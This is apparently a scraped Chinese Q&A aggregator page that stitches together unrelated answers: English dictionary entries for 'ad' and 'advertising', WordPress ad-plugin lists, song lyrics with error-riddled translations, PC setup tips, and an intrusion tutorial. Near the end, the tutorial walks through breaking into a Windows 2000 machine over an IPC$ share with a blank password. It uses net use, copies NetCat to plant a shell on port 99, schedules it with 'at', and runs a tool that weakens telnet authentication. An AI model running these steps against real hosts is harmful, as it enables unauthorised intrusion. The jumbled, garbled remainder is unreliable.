barriers / 阅读 / 详情


2023-05-19 17:30:04






















  这样在国内两年才能读完的课程在香港一年就可以完成,而且港校推崇务实的教学理念, 要求学生能够充分的学以致用。

























  • 优质的本科教育  香港高校拥有国际化的教育背景与师资力量,本科教育在全球具有很好的声誉,在世界高校的综合排名中也比较靠前。

  • 世界名校的跳板  香港高校全部采用英文授课,教学模式与国际接轨。另外,在香港读大学,将来去澳大利亚、英国等国家留学,就能免签证。

  • 留学费用相对低廉  与欧美的留学费用相比,香港的教育资源相对便宜,同时香港的奖学金项目很多,更是在某种程度上降低了求学成本。

  • 宽松的就业政策  香港高校拥有国际化的教育背景与师资力量,本科教育在全球具有很好的声誉,在世界高校的综合排名中也比较靠前。







































Life of HK,怎会单调













高素质 讲文明 到哪儿都会被尊重




2023-01-04 00:55:323


2023-01-04 00:55:484


2023-01-04 00:56:012


一、 ad 简明英汉词典 [基本词义] ad [Ad] n. (1) 广告 (2) [域] Andorra , 安道尔 abbr. (3) [军] Air Defense, 防空 现代英汉综合大辞典 [基本词义] ad [Ad] n. (1) 广告 want ad 招聘广告 现代英汉词典 [基本词义] ad [Ad] n. (1) 广告 二、 advertisement 简明英汉词典 [基本词义] advertisement [Ed5vE:tismEnt] n. (1) 广告, 做广告 现代英汉综合大辞典 [基本词义] advertisement [Ed5vE:tismEnt] n. (1) 广告, 通知 (2) 宣传 a full page advertisement 整页的大广告 wide advertisement 广为宣传 A-helps to sell goods. 广告(能)帮助推销货物。 [特殊用法] classified advertisement (1) 分类广告 commercial advertisement (1) 商业广告 paragraph advertisement (1) 写成新闻性的广告 publishers" advertisement (1) 出版商广告 television advertisement (1) 电视广告 tombstone advertisement (1) 证券发行公告; 证券经销人名单 advertisement of insurer (1) 承保人广告 现代英汉词典 [基本词义] advertisement [Ed5v:tIsmEnt] n. (1) 广告(= ad) The wall was covered with advertisements. 墙上贴满了广告。 It has many advertisements and many different sections. 星期日报有很多广告和许多栏目。 They like advertisements which show women in office, planes, and cars. 妇女们喜欢那些表现妇女在办公室工作、乘飞机旅行、驾驶着汽车等情形的广告。 (2) 登广告 三、 advertising 简明英汉词典 [基本词义] advertising [5AdvEtaiziN] n. (1) 广告业, 广告 adj. (2) 广告的 现代英汉综合大辞典 [基本词义] advertising [5AdvEtaiziN] n. (1) 广告(业) [词性变化] advertising [5AdvEtaiziN] adj. (1) 广告的, 与广告有关的 an advertising career 广告事业 the advertising columns (报上的)广告栏 advertising agency[firm] 广告公司 =adman advertising rates 广告费, 广告价格 advertising man [特殊用法] bank advertising (1) 银行广告 billboard advertising (1) 展台广告 collective advertising (1) 联合广告 competitive advertising (1) 竞争性广告 concept advertising (1) 有新意思的广告 cooperative advertising (1) 工商业联合广告 electric(al)advertising (1) 灯光广告 group advertising (1) 集体广告 hand bill advertising (1) 传单, 广告, 招贴 informative advertising (1) 商品介绍广告 illuminated advertising (1) 灯光广告 institutional advertising (1) 建立永久声誉的广告 keyed advertising (1) 广告索引 local advertising (1) 区域性广告 magazine advertising (1) 杂志广告 media advertising (1) 报刊等宣传工具上的广告 national advertising (1) 全国性广告 network advertising (1) 网络性广告 outdoor advertising (1) 街头[室外]广告 point-of-purchase advertising (1) 零售商说明其经营业务的广告标志 price advertising (1) 价格广告 puffing advertising (1) 口头广告 radio advertising (1) 无线电广播广告 slide advertising (1) 幻灯广告 technical press advertising (1) 技术刊物上的广告 trade advertising (1) 商业性刊物上的广告 transit advertising (1) 公共交通工具上的广告 现代英汉词典 [基本词义] advertising [5AdvEtaIsIN] n. (1) 广告 advertising agency 广告公司 advertising agent 广告经纪人 advertising expense 广告费 And advertising is one of the biggest businesses in America. 广告是美国最大的行业之一。
2023-01-04 00:56:104


2023-01-04 00:56:233


楼上的 真强啊……-。-|||
2023-01-04 00:56:404


recent years, the research of advertisement English has made the very big progress, however, it is as if insufficient to understand its fuzziness in the former research, and it is also one of reasons to present the paper. This research is for the purpose of giving the certain enlightenment to the advertisement editor and the consumer,therefore it has the widespread practical significance. As the adman, we must be good at grasping the fuzzy criterion of the language, thus attracting general expense community"s attention to the greatest degree within the limited length and the limited time, increasing the advertisement power, displaying the best commercial function of advertisement language.for the populace who expended, understanding the fuzziness of the advertisement language could cause them understand the charm of the advertisement language so well that they can make the correct choice promptly at same time.
2023-01-04 00:56:564


安装打印机方法:1 开始--控制面板--添加打印机。2 点击下一步,(如果打印机在本机,选择此计算机连本地打印机,之后点下一步3、选择打印机插孔,一般的usb和ltp1,插口,正常你的这个是ltp插口的。,选择完毕点下一步)。4、点下一步,在出现一个对话框,在厂商那里找惠普,在型号那里找到对应型号。5、点击下一步,下一步,完成。6、插上打印机,通电,自动检测完成安装。
2023-01-04 00:57:091


2023-01-04 00:57:144


All in One Adsense and YPN:可以让用户非常方便的在Wordpress后台生成免费的Adsense广告和雅虎广告的管理插件, 包含多种配置选项, 不需要手动添加代码, 一切皆在Wordpress后台即可完成. 插件主页 AdServe - AdServe是一个Wordpress广告插件.你可以使用这个Wordpress插件设置各种Banner尺寸的广告,并且可以在后台实现展示和点击统计等.插件主页. Smart Ads - 这个Wordpress插件可以让你插入你的广告到文章中,而插入位置可以根据文章字数,文章日期或其它一些参数来进行设置.插件主页. Random / Rotating Ads - 这是一个Wordpress随机广告插件, 可以让你简单轻松的显示随机广告或轮播广告到任何你想放置的地方. Adman - Adman是一个Wordpress广告插件,可以实现把广告插入到指定的文章中间部分 插件主页 Post Layout - 这个插件可以让你不需要修改Wordpress模板的前提下, 轻松插入HTML, JavaScript 或 PHP代码到文章中, 这也就意味着你可以很方便的插入Adsense或其它广告代码到你的文章中. 插件主页. LinkShare RSS DealFeed - LinkShare RSS DealFeed是链接广告平台LinkShare专门为Wordpress用户推出的插件. 可以自动插入Linkshare的链接广告到欠的Wordpress博客和RSS Feed. 当然, 前提是你加了LinkShare. wordpress125 - 125*125广告已经成为博客上面的主流广告格式, 这个Wordpress插件就是用来让你更加方便的管理你博客中的125*125广告. .插件主页 AdSense Revenue Sharing 1.2 - 这个Wordpress的Adsense插件可以让你轻松插件入Adsense广告到你的博客中且能向你的朋友显示你的Adsense广告收益. 插件主页 wordpress Tag Ads - wordpress Tag Ads是一个比较特别的Wordpress广告插件. 它可以根据wordpress文章的Tag标签系统来显示不同的广告. 当然, 这并不是说能影响到Adsense广告, 产品购物类的广告会比较适合. 比如标签为Music, Movie之类的文章里面就可以设置成显示Ebay的DVD, CD购物广告, 以此类推. 如果你正好有这方面的广告投放, 那这是一个值得尝试的插件. Context Ad Wrapper - Context Ad Wrapper是一个Wordpress广告插件, 可以加强关键词广告的关联性, 避免显示不相关的广告. 目前据开发者测试支持的广告有Google Adsense, Amazon的文字内容链接广告和另外两个国外的广告平台. 插件主页 AdRotate - 一个非常简单的Wordpress随机广告插件. 插件主页 Wordpress-Banner - Wordpress Banner广告插件. AdSense Manager - Wordpress的AdSense广告管理插件, 可以让你方便的管理AdSense和其它广告平台的广告代码, 实现轻松的插入, 修改, 自动显示在指定的文章中等等. 插件主页 AskApache Firefox Adsense - 这个Wordpress广告插件用来向非Firefox用户显示Firefox的推荐广告. 这种有针对性的广告显示插件很棒. 不过, 现在, 已经用不上了. 插件主页 Adsense-Deluxe2 - 又一个Adsense广告管理的Wordpress插件. 支持单独的Wordpress程序和Wordpress MU. 插件主页 Accelerate your advertising - 每一个都希望自己的博客都能以最快的速度载入. 而广告代码对网页的载入速度有很多的影响, 这个Wordpress广告插件通过把广告显示排到最后来加速你的网页内容显示. MaxBlogPress Stripe Ad - 是一款可以置顶显示文字广告或者声明,告示等等的WordPress插件。可以自由添加多个文字广告来循环展示,设置标题和链接,同时可以设置权重来调整 不同广告的展示次数比例。能够设置是否浮动置顶显示,是否显示关闭按钮。同时可以设置颜色,字体,边框等等样式,而且可以设置不同的展示方式。对于想在 Blog上插播文字广告,声明等等还是很方便的。另,下载之前需要注册。via Author Adsense - 这是一个适合多个博客的Wordpress插件, 允许博客中的每个作者输入他们自己的广告代码, 然后显示在各自发表的文章中. 另外还有一个适合Wordpress MU的版本 - Author Adsense MU plugin 转自:洛克的彩色天空
2023-01-04 00:57:281


你好,很高兴为你解答:1、可能是未安装网卡驱动,可以在别处下载货拷贝一个驱动精灵,然后一键扫描安装网卡驱动即可。  2、如果网卡驱动正常,就打开【开始菜单】,点击【控制面板】,  3、然后点击【网络和Internet】,再点击【网络和共享中心】,  4、接着点击【更改适配器设置】,再用鼠标右击【无线网络连接】,选择【属性】打开,  5、在弹出的窗口中,选中【Internet协议版本4】,点击【属性】按钮,  6、最后选择自动获得IP地址,自动获得dns服务器地址即可。
2023-01-04 00:57:365


2023-01-04 00:58:216


2013年,国际创意大师Boker David来中国布道,在现场的听众要求讲一些创意的时候,Boker David直言不讳地说:中国的广告没有创意可言,中国的广告人只关注charge,而对idea毫不在意。在那次讲座的观众席里,坐着两位年轻人,听了Boker David的话之后,两位年轻人都在心里留下了一个信念,那就是:改变中国广告界。4年后,这两位年轻人都在中国广告界声名鹊起,其中一位叫做张咏调的年轻人凭借精准的群体观察,创办了广告行业专业刊物-《The Adman》,被称为中国广告界的“良心”;而另一位年轻人以先锋性的创意手法在好强林立的中国广告行业披荆斩棘,曾将多个默默无闻的品牌打造成传世品牌,而他也逐渐被人们称为“先锋策划大师”、“后现代文案大神”、“中国广告界百年一遇的天才”,他的的名字叫做范三石。即使夜空暗淡,也要成为星星的人!中国广告从未真正得到过世界的尊重,直到那两位年轻人的出现,而他们的出现也开创了中国广告新的时代,人们称之为“New Ad Day”!
2023-01-04 00:58:433


对酶进行分离纯化,然后测序(Adman测序法),条件允许的话就人工合成该蛋白基因,利用基因工程转移到合适载体。没条件的话就对那个可以产生酶蛋白的细胞进行基因测序,利用soughten blot 分子杂交技术确定指导该酶的基因。再然后,还是基因工程技术,内切酶切割基因,导入受体,蛋白表达测定!
2023-01-04 00:58:572


是不是Jonny B——《down low》? Check it out仔细听着  It"s eleven-thirty my hand is getting dirty  现在是11点30 我的手看不清了  Snatchin" up things that probably can"t be  waitin"抓住它 时间不会等你  Now this is a vision of a violent life  现在这是被生活扭曲的幻觉  Livin" by a guard and totem of the night 作为  夜晚的象征物守卫者活着  I"m slammin" doors 2-4-5 "n pullin" the keys  我关上245号门 拔出钥匙  Now these are the traged valuable luxuries to  me现在对我来说,这些都是有价值的奢侈  In the early dawn before you yawn  在你瞌睡之前你倒下了  I"ve been there swiped you and then I"m gone  我在哪里猛击了你 然后离开了  Now it"s six-o-clock my heart tic-tacs  现在是6点整 我的心脏滴嗒作响  A black sadden bag full of badass rocks  一个黯黑色的包里装满了该死的钻石  My identity has to bexposed  我的身份暴露无疑  Stealing from the spot that I chooly chosed  我以偷窃被指认 查理被关了起来  I lose and enfuse my choice to chose  我错失并毁掉了去选择的机会  Now I"m sick and I"m fallin" deeper in the mess  现在我很不爽深陷于困境之中  There"s no hope for me see  我看不到一丝希望  My path has been chosen I"m Johnny B  我的道路已经选择了 我是Johnny B  CHORUS  合唱:  Johnny B how much there is to see  JOHNNY B你还能看到多少希望  Just open your eyes and listen to me  睁开眼睛听我说  Straight ahead a green light turns to red  一道普通的绿光变成红色  Ooh why can"t you see ooh Johnny B  哦 为什么你不能看一下 哦 Johnny B  CHORUS  合唱.  the situation"s tight  在这棘手的状况中  You are billin" by the night  你成为了这夜晚的账单  Can"t choose between the wrongs and the rights  徘徊在对与错之间  I"m searchin" for the clues yo-what am I gotta  do  等等 我可以为寻找证据做些什么  I got the habit to take valuable things from  you  我习惯于从你哪里得到一些有价值的东西  Here I stand and I"m physically trapped by my  tent  我站在这里身体却被困在住处  Drifting漂流 northern breeze微风 triumphal凯旋  is this adman  微微的北风卷起的吹积物是这个广告人  A lonely path when I stand alone  当我站在无助的道路上  A round mothern flexion弯曲 曲折 bendin"使曲从  by my own  Here I lay down into certain deaths  我躺在这里进入无情的死亡  Two spirits calls grabs my very last breath  两个灵魂称夺取了我最后的呼吸  Sometimes I wishreveseness in my path  有时我希望在路上徘徊  A simple guest or a simple laugh  一个简单的待客和笑容  But I"m evil dirty and mean  但是我邪恶肮脏而且吝啬  Two pounds blood pasts through my bloodstream血  流  Frightened huh you should be  使我害怕 哈 你应该的  Who am I I"m Johnny B  我是谁 我是Johnny B  CHORUS.  Here we go here we gonow check the flow  (一起来)我们查看这流血  Here we go Johnny B is in control  Johnny B是凶手  REPEAT  It"s a sleepless night he"s callin" your name  这是个他呼唤你名字的难眠之夜  It"s a lonely ride I know how you saw him  这是个孤独的遁逃我知道你如何看到他的  Again and again he"s dressin" his dreams  一次又一次身披他的梦想  Yeah Johnny my friend it"s not what it seems  yeah Johnny我的朋友并不是你看到的那样  REPEAT CHORUS TWICE
2023-01-04 00:59:051


2023-01-04 00:59:113


Check it out仔细听着 (Listen carefully;Check it out意为:检查出来)It"s eleven-thirty my hand is getting dirty 现在是11点30 我的手看不清了(It is 11:30 and I can not see the hand of the;MY因用于句首或逗号之后啊!你这样翻译出来就是“这是1130年我的手越来越肮脏”这个意思了啊!) Snatchin" up things that probably can"t be waitin"抓住它 时间不会等你(Seize the time it will not wait for you;“wait”的过去分词应该不是“waitin”吧,按你这句翻译出来也不是这个意思啊!) Now this is a vision of a violent life现在这是被生活扭曲的幻觉 (This is now being distorted life of illusion;时间状语不能放在前面!你这句话翻译出来的意思也不对啊!变了味啊!变成“现在这是一个理想的暴力生活”这个意思了) Livin" by a guard and totem of the night 作为夜晚的象征物守卫者活着 (As a night guard symbols are alive;你那样翻译出来意思就变了啊!变成了“美好生活由一名后卫和图腾的夜晚”)I"m slammin" doors 2-4-5 "n pullin" the keys 我关上245号门 拔出钥匙 (正确的应该是I closed the door, pull out the 245 key; “pullin"”好像没见过啊! )Now these are the traged valuable luxuries to me现在对我来说,这些都是有价值的奢侈 (应该这样写“Now to me, these are valuable luxury”你这样改变了他原来的意思了,变成“现在,这些都是宝贵的奢侈品”价值这个词不用刻意的写出来啊)In the early dawn before you yawn 在你瞌睡之前你倒下了 (You sleepy before you fell;在这里不能用early的在....之前应该是before)I"ve been there swiped you and then I"m gone 我在哪里猛击了你 然后离开了(Where do I hit you and then left the;“I"ve been 不适合用于此句”句子的时态不对) Now it"s six-o-clock my heart tic-tacs 现在是6点整 我的心脏滴嗒作响 (It is 6:00 my whole heart ticking sound,直接用进行时即可表明现在一词“tic-tacs ”应用V+ing形式,表示现在进行时)A black sadden bag full of badass rocks 一个黯黑色的包里装满了该死的钻石 (A dark black bag filled with bloody diamonds;不必用过去分词,句子的时态错误)My identity has to bexposed 我的身份暴露无疑 (to 后面应加动词原形!)Stealing from the spot that I chooly chosed 我以偷窃被指认 查理被关了起来(I identified with theft and Charlie was up;句子的时态错误,主语应放在句首) I lose and enfuse my choice to chose 我错失并毁掉了去选择的机会 (I missed and lost the chance to choose;这里不适合用lose,因为lose意为为:遗失)Now I"m sick and I"m fallin" deeper in the mess 现在我很不爽深陷于困境之中 (Now I am out of sorts in deep trouble)There"s no hope for me see 我看不到一丝希望 (I do not see a ray of hope 主语前置)My path has been chosen I"m Johnny B 我的道路已经选择了 我是Johnny B (I have chosen the path that I am a Johnny B)CHORUS 合唱: (Chorus;后面小写)Johnny B how much there is to see JOHNNY B你还能看到多少希望 (JOHNNY B you can see how much hope)Just open your eyes and listen to me 睁开眼睛听我说 (Open your eyes and listen to me)Straight ahead a green light turns to red 一道普通的绿光变成红色 (An ordinary green light turns red)Ooh why can"t you see ooh Johnny B 哦 为什么你不能看一下 哦 Johnny B (Oh why can not you take a look at Oh Johnny B)CHORUS (Choir.)合唱. the situation"s tight 在这棘手的状况中 (In this difficult situation)You are billin" by the night 你成为了这夜晚的账单 (You become the night of the bill)Can"t choose between the wrongs and the rights 徘徊在对与错之间 I"m searchin" for the clues yo-what am I gotta do 等等 我可以为寻找证据做些什么 I got the habit to take valuable things from you 我习惯于从你哪里得到一些有价值的东西 Here I stand and I"m physically trapped by my tent 我站在这里身体却被困在住处 Drifting漂流 northern breeze微风 triumphal凯旋 is this adman 微微的北风卷起的吹积物是这个广告人 A lonely path when I stand alone 当我站在无助的道路上 A round mothern flexion弯曲 曲折 bendin"使曲从 by my own Here I lay down into certain deaths 我躺在这里进入无情的死亡 Two spirits calls grabs my very last breath 两个灵魂称夺取了我最后的呼吸 Sometimes I wish reveseness in my path 有时我希望在路上徘徊 A simple guest or a simple laugh 一个简单的待客和笑容 But I"m evil dirty and mean 但是我邪恶肮脏而且吝啬 Two pounds blood pasts through my bloodstream血流 Frightened huh you should be 使我害怕 哈 你应该的 Who am I I"m Johnny B 我是谁 我是Johnny B CHORUS. Here we go here we go now check the flow (一起来)我们查看这流血 Here we go Johnny B is in control Johnny B是凶手 REPEAT It"s a sleepless night he"s callin" your name 这是个他呼唤你名字的难眠之夜 It"s a lonely ride I know how you saw him 这是个孤独的遁逃我知道你如何看到他的 Again and again he"s dressin" his dreams 一次又一次身披他的梦想 Yeah Johnny my friend it"s not what it seems yeah Johnny我的朋友并不是你看到的那样 请找出语法错误。误解并纠正剩下的自己解决阿,我好累啊!就在这个网址里面|en|%E4%BD%A0%E6%88%90%E4%B8%BA%E4%BA%86%E8%BF%99%E5%A4%9C%E6%99%9A%E7%9A%84%E8%B4%A6%E5%8D%95%20
2023-01-04 00:59:221


2023-01-04 00:59:301


dramatics dragon adman
2023-01-04 00:59:354


2023-01-04 00:59:494

( )的广告

一、 ad 简明英汉词典 [基本词义] ad [Ad] n. (1) 广告 (2) [域] Andorra , 安道尔 abbr. (3) [军] Air Defense, 防空 现代英汉综合大辞典 [基本词义] ad [Ad] n. (1) 广告 want ad 招聘广告 现代英汉词典 [基本词义] ad [Ad] n. (1) 广告 二、 advertisement 简明英汉词典 [基本词义] advertisement [Ed5vE:tismEnt] n. (1) 广告, 做广告 现代英汉综合大辞典 [基本词义] advertisement [Ed5vE:tismEnt] n. (1) 广告, 通知 (2) 宣传 a full page advertisement 整页的大广告 wide advertisement 广为宣传 A-helps to sell goods. 广告(能)帮助推销货物。 [特殊用法] classified advertisement (1) 分类广告 commercial advertisement (1) 商业广告 paragraph advertisement (1) 写成新闻性的广告 publishers" advertisement (1) 出版商广告 television advertisement (1) 电视广告 tombstone advertisement (1) 证券发行公告; 证券经销人名单 advertisement of insurer (1) 承保人广告 现代英汉词典 [基本词义] advertisement [Ed5v:tIsmEnt] n. (1) 广告(= ad) The wall was covered with advertisements. 墙上贴满了广告。 It has many advertisements and many different sections. 星期日报有很多广告和许多栏目。 They like advertisements which show women in office, planes, and cars. 妇女们喜欢那些表现妇女在办公室工作、乘飞机旅行、驾驶着汽车等情形的广告。 (2) 登广告 三、 advertising 简明英汉词典 [基本词义] advertising [5AdvEtaiziN] n. (1) 广告业, 广告 adj. (2) 广告的 现代英汉综合大辞典 [基本词义] advertising [5AdvEtaiziN] n. (1) 广告(业) [词性变化] advertising [5AdvEtaiziN] adj. (1) 广告的, 与广告有关的 an advertising career 广告事业 the advertising columns (报上的)广告栏 advertising agency[firm] 广告公司 =adman advertising rates 广告费, 广告价格 advertising man [特殊用法] bank advertising (1) 银行广告 billboard advertising (1) 展台广告 collective advertising (1) 联合广告 competitive advertising (1) 竞争性广告 concept advertising (1) 有新意思的广告 cooperative advertising (1) 工商业联合广告 electric(al)advertising (1) 灯光广告 group advertising (1) 集体广告 hand bill advertising (1) 传单, 广告, 招贴 informative advertising (1) 商品介绍广告 illuminated advertising (1) 灯光广告 institutional advertising (1) 建立永久声誉的广告 keyed advertising (1) 广告索引 local advertising (1) 区域性广告 magazine advertising (1) 杂志广告 media advertising (1) 报刊等宣传工具上的广告 national advertising (1) 全国性广告 network advertising (1) 网络性广告 outdoor advertising (1) 街头[室外]广告 point-of-purchase advertising (1) 零售商说明其经营业务的广告标志 price advertising (1) 价格广告 puffing advertising (1) 口头广告 radio advertising (1) 无线电广播广告 slide advertising (1) 幻灯广告 technical press advertising (1) 技术刊物上的广告 trade advertising (1) 商业性刊物上的广告 transit advertising (1) 公共交通工具上的广告 现代英汉词典 [基本词义] advertising [5AdvEtaIsIN] n. (1) 广告 advertising agency 广告公司 advertising agent 广告经纪人 advertising expense 广告费 And advertising is one of the biggest businesses in America. 广告是美国最大的行业之一。
2023-01-04 01:00:461


postman—postmenpostman是属于特殊变化的,变化后的复数形式就是postmen其实就是把词尾的man(男人)变复数postmen 以-man 或者-woman 结尾的词都是这样,把man或woman 变复数就OK了。比如:seaman-seamen 海员,水手,精通海事的人,水兵Indiaman-Indiamen 过去用于与印度做生意的商船militiaman-militiamen 民兵cabman-cabmen 出租马车(或汽车)司机clubman-clubmen 俱乐部会员,交际家subman-submen (发育或理解力)极差的人,残暴的人adman-admen 广告员 suburbbadman-badmen 不法分子,偷牲口的人贼,受雇用的刺客headman-headmen 工头,监工,
2023-01-04 01:00:551

什么是 what"s the price break

就是打几折的意思price break[物价] 价格间断;大量订货折扣价(批发价)
2023-01-04 01:01:152


2023-01-04 01:01:389


2023-01-04 01:02:115


2023-01-04 01:02:344

求一首歌曲苏荷酒吧曾经播放过。有点老了 开始是笛声,之后就是一个男声说唱.说唱很棒...

感觉有点像nobody`s listening
2023-01-04 01:02:492


2023-01-04 01:02:5810


2023-01-04 01:03:483

月老咒语 为你揭晓你们之间的秘密?

月老咒语 :恋爱中的男女都是盲目的,在热恋中找到自我并不是件容易的事月老咒语为你提供更明晰的方向 爱情路上愿天下有情人都能享受到爱情的甜蜜。。。。哦对了:因为树上有相思鸟 所以才有了相思树
2023-01-04 01:04:001


开机按 del 里面找 boot 选项。
2023-01-04 01:04:073

here we go here we go every body get out。歌词里有这样的。

Bowling For Soup 的" Here We Go "歌词:Here We GoHere We GoEverybody"s Gonna get down let"s goHere we goHere we goEverybody"s gonna get down... let"s go!Back up man Your out of control (yeah)Your stressed out at full throttle (naw)Got so many problems I don"t need more (yeah)I"m with my friends we just wanna roll (naw)Right on through to the other sideRight on through, we will neva hideCause this is our town to rideAnd our Chevey will flyHere we goHere we goEverybody"s gonna get down, Let"s Go Here we goHere we goEverybody"s gonna get down.. let"s go!This is our plan understandWe"re blastin out music from a foreign landReggae and soul, punk, rock and roll, boom-box, radio. With all this music We don"t wanna drop (yeah)With all this musicWe"ll never stopAnd... nonstop night spotnonstop night spot, night spot not stopHere we goHere we goEverybody"s gonna get down, let"s goHere we goHere we goEverybody"s gonna get down.... let"s go!I"ve been to KingstonI"ve been to London, Osaka, NevadaAnd back to Brooklyn, I"ve been to Nevada,I"ve been to Stockholm, Sacremento, Fresno,I"ve been to Oakland.It"s not about flexinOr startin a fightIt"s not about who"s wrong or rightIt"s all about hanging with your friends tonightAt 7-11 everyday and nightHere we goHere we goEverybody"s gonna get down, let"s goHere we goHere we goEverybody"s gonna get down.... let"s go! Here we goHere we goEverybody"s gonna get down, let"s goHere we goHere we goEverybody"s gonna get down.... let"s go!
2023-01-04 01:04:222


显示正常。可能是你的浏览器原因如果是maxthon浏览器 删除相应目录下的所有icon文件。刷新页面就有了
2023-01-04 01:05:322


你要的是这个吧: SVA上广电液晶电视30秒电视广告: 平面广告: 补充: 视频暂时没有找到,那平面应该是你要的吧? 要想了解更多,请照参考资料.
2023-01-04 01:05:431


2023-01-04 01:05:503


2023-01-04 01:06:0515


本次范例需要的系统及程序情况如下: 操作系统:Windows 2000 对方操作系统:Windows 2000 程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP) 程序(二):Srv.exe 程序(三):Ntlm.exe 本机IP: 测试IP: 新程序介绍: Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。 Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。 关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。 扫描IPC$主机 假设,我们扫描了一台IPC$主机: 用户名:davis 密码:空 “//”后是注解。 Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-1998 Microsoft Corp. D:>net use$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~! 命令成功完成。 D:>copy srv.exe$ //先复制srv.exe上去,在流光的Tools目录就有。 已复制 1 个文件。 D:>net time //查查时间。 的当前时间是 2001/1/17 上午 10:48 命令成功完成。 D:>at \ 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。 新加了一项作业,其作业 ID = 1 D:>net time \ //再查查够时间没有?!噢~~够了~ 的当前时间是 2001/1/17 上午 10:51 命令成功完成。 D:>telnet 99 //我们telnet吧,注意端口是99哦~ Microsoft Windows 2000 [�セ 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:> //噢~~成功了! D:>copy ntlm.exe \$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上。(也是在流光流光的Tools目录) 已复制 1 个文件。 Microsoft Windows 2000 [�セ 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:>ntlm //我们输入ntlm启动吧。 ntlm Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done! //OK~:) C:> C:>net start telnet //然后直接用net start telnet启动telnet. net start telnet Telnet 狝叭タ�币笆 . Telnet 狝叭�竒币笆Θ�� //直觉告诉我成功了~!(没办法,这里是乱码) C:> C:> //这个窗口已经没用了,关了他吧! D:>telnet //我们在开一个DOS窗口,然后telnet上去。 NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: davis //输入用户名 password: //输入密码(密码是空的,所以不用输入)
2023-01-04 01:07:103


SummaryTV media regard as, offer information and important tool of amusement have important function among people"s life. With the aggravation of trade competition, the TV media will meet the keen competition situation when there are other fields more unavoidably. Provincial satellite TV station as file leader soldier of media, TV of Chinese, want, undertake important political task of press campaign on one hand, want, do well, manage, maximize audience rating of fighting for, bear province whom sets of advertisement create income heavy to let even more on the other hand. How make province grade break out defend apparent and numerous and similar, become, attract more audience brand media of eyeball, have already become the important subject that TV employee and advertiser have faced at present.On the basis of TV programme quality really up to the mark, TV media channel into CIS and correct to employ VI become TV set media absorb the audience gradually, and is pointing out the audience in order to keep it to particular TV station, the channel and column rating loyalty constantly, and then promote the important strategic choice of TV brand assets. This text defend case of regarding so as to representative Hunan as, pass the study on its VIS visual recognition system, shine upon China provincial Satellite TV current situation that VIS employ, probe into provincial provincial Satellite TV general route and layout strategy that VI employ, VI of Satellite TV.Keyword: Provincial Satellite TV, CI VI VI application, the packaging of channel
2023-01-04 01:07:252


按键盘上“~”键打开控制台,之后在控制台输入具体代码并按回车。1、来到87掩体的外围被一群小孩守着,你可以冷血清光他们。2、总之最后获得进入87掩体的门。3、这个恐怖的鬼地方,可是当年FEV生化病毒的实验室哩。4、这里会遇到全GAME最强同伴,号称42万滴血的FAWKES。5、他问你净水机的密码,如果你老实讲出来那就GAME OVER了
2023-01-04 01:07:432


蓝巨星- -??????
2023-01-04 01:09:123


你的电脑配置太低 尤其是内存。。。
2023-01-04 01:09:267


2023-01-04 01:09:491


upset1及物动词 vt. 1.弄翻,打翻;倾覆The generals plotted to upset the government. 将军们策划推翻政府。 2.打乱,搅乱Rain upset our plans for a picnic. 下雨打乱了我们的野餐计划。 3.意外地击败The Democrat upset the governor in the election. 这位民主党人在选举中意外地击败了州长。 4.使心烦意乱Losing the necklace borrowed from her friend upset her completely. 她把从朋友那儿借来的项链弄丢了,这使她心烦意乱。 5.使(肠胃)不适The lousy food upsets my stomach. 这糟糕的饭菜使我肠胃不适。 不及物动词 vi. 1.翻倒;倾覆The boat will upset if a storm breaks. 如遇暴风雨,这条船会翻掉。 形容词 a. 1.翻倒的;翻覆的an upset boat 倾覆的船 2.搅乱的,混乱的3.心烦的,苦恼的[F][(+about/at/over)]He was horribly upset over her illness. 他为她的病而忧心忡忡。 4.不适的I"m suffering from an upset stomach. 我的肠胃正不舒服着呢。 upset2名词 n. 1.翻倒;倾覆[C][U]The upset of the boat caused three deaths. 翻船造成三人死亡。 2.混乱,搅乱[C]The fire caused an upset in the building. 失火使大楼里一片混乱。 3.意外的击败[C]Our team suffered an upset. 我们的球队遭到意外的失败。 4.心烦意乱[C]The news gave her quite an upset. 这消息使她大为心烦意乱。 5.(肠胃的)不舒服[U]I had a stomach upset last night. 我昨天夜里肠胃不适。 6.【口】吵架[C] upset. v (-tt-pt, pp upset) 1 [I, Tn](cause sth to) become overturned or spilt, esp accidentally打翻, 弄翻(某物)(尤指无意地): upset one"s cup, the milk, a plate of biscuits 弄翻了自己的杯子、 牛奶、 一盘饼乾 * A large wave upset the boat. 一个巨浪打翻了船. 2 [Tn] disrupt (a plan, etc) 打乱, 扰乱(计画等): upset the balance of trade 打破贸易平衡 * Our arrangements for the weekend were upset by her visit. 她一来把我们周末的安排给打乱了. * Fog upset the train timetable. 这场大雾搅乱了火车的班次. 3 [Tn] (a) distress the mind or feelings of (sb) 使(某人)苦恼或心烦: be emotionally upset 心烦意乱 * Don"t upset yourself -- no harm has been done. 不要难过--并没有造成伤害. * The sight of physical suffering always upsets me. 我看到身体受折磨的情形总是心惊肉跳. * He was upset at not being invited. 人家没邀请他, 他很不痛快. (b) cause (sb) to feel ill by disturbing his digestion 使(某人)感到肠胃不适: Cheese often upsets her/her stomach. 她吃乳酪后常常感到不舒服[肠胃不适]. 4 (idm 习语) upset the/sb"s `applecart (a) spoil a plan or disrupt an arrangement打乱计画或安排: Her refusal to help quite upset the applecart. 她不肯帮忙, 计画也就落空了. (b) disprove a theory 推翻一理论或说法. upset n 1 [U, C] upsetting or being upset 翻倒; 扰乱; 不安: Last-minute changes caused a great deal of upset. 出现的临时变动造成一片混乱. * She had a major emotional upset. 她情绪上受到了沉重的打击. 2 [C] stomach disorder 肠胃不适: (infml 口) in bed with a tummy upset 